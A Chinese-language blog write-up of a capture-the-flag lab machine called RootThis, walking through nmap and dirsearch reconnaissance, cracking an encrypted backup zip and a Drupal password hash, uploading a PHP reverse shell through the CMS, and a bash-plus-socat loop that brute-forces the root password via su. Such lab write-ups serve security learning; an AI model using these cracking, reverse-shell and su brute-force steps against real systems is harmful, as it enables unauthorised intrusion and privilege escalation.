RootThis靶机复盘

RootThis靶机复盘

在这个靶机中收获良多,首先学会了一个新的交互方式,不需要用python了,同时知道了什么是静态链接文件,还有就是学会了遇到数据库文件应该怎么解决。

/usr/bin/script -qc /bin/bash /dev/null
静态链接版本的程序包含了所有的库文件,一个文件就够了,运行不用下载别的库。

正文:

这个靶机我放扫描ip的图片了,这里扫描到一个drupal,这个是我们之前做DC靶机系列时候就遇到过,backup目录是一个加密的zip文件,我们下载到本机上来。

ip扫描,查找靶机地址

nmap -sP 192.168.102.0/24

对靶机进行一个单独的扫描.

nmap -A 192.168.102.175 -p-

扫描目录

dirsearch -u http://192.168.102.175

image-20230714180009976

image-20230714175841084

把因为加密的,我们用工具爆破一下,很快密码就出来了,解压后发现里面是一个数据库。

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt backup.zip

image-20230714175316429

image-20230714180823023

我们打开kali自带的数据库,然后把这个数据库放进去,这样方便我们查看数据库内容,发现多了一个新的数据库。

service mariadb start 
source dump.sql

image-20230714181020937

打开这个数据库,并显示里面的表。

use drupaldb
show tables;

image-20230714181121510

看到里面有一个users表,我们查看一下里面内容,发现有一个用户名和一个加密的密码。

image-20230714181258430

我们用john来爆破一下密码,很快密码就出来了。

image-20230714181901672

这样就可以登陆上我们这个网站了。

image-20230714182041692

因为以前遇到过这样的CMS,所以知道是个什么结构,我们可以加一个PHP插件,这样就能反弹shell到我们的kali上了。

image-20230714182152335

image-20230714182319336

image-20230714182336098

kali中有自带的反弹shell脚本,我们找到并复制到这个网站上去。

image-20230714182459994

把ip和端口号都写程我们自己的。

image-20230714182609904

这样我们就拿到了一个shell,因为这个靶机没有python。

我们可以用下面语句得到一个正宗的shell。

/usr/bin/script -qc /bin/bash /dev/null

image-20230714182655106

我们进去以后发现一个文件,里面提醒说rockyou.txt文件中前300行有root用户的密码。

image-20230714182942613

我们把rockyou.txt的前300行取出来放到300.txt中去,然后下载到靶机的/tmp目录中。

这300个密码实在太多了,我们不能一条一条爆破,所以我们需要写一个bash进行爆破,就用到了下面代码。

bash需要socat工具,我们可以下载静态socat文件,所有需要的库都包含到这里面的。

image-20230714190725691

静态链接版本的socat程序包含了所有的库文件,因此不需要在系统上安装任何依赖项。

静态socat下载地址。

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

a.sh文件内容

#!/bin/bash

for i in `cat 300.txt`
do
	echo "$i"
	(sleep 0.1; echo "$i") | ./socat - EXEC:'bash -c "su -c id"',pty
	
done

image-20230714204306919

给a.sh和socat加上x权限。

在bash a.sh运行,到root密码的时候就会暂停了。

image-20230714200829283

这样我们就成功拿到了root权限。

image-20230714201642117

你可能感兴趣的:(打靶机系列,linux,web安全,网络安全)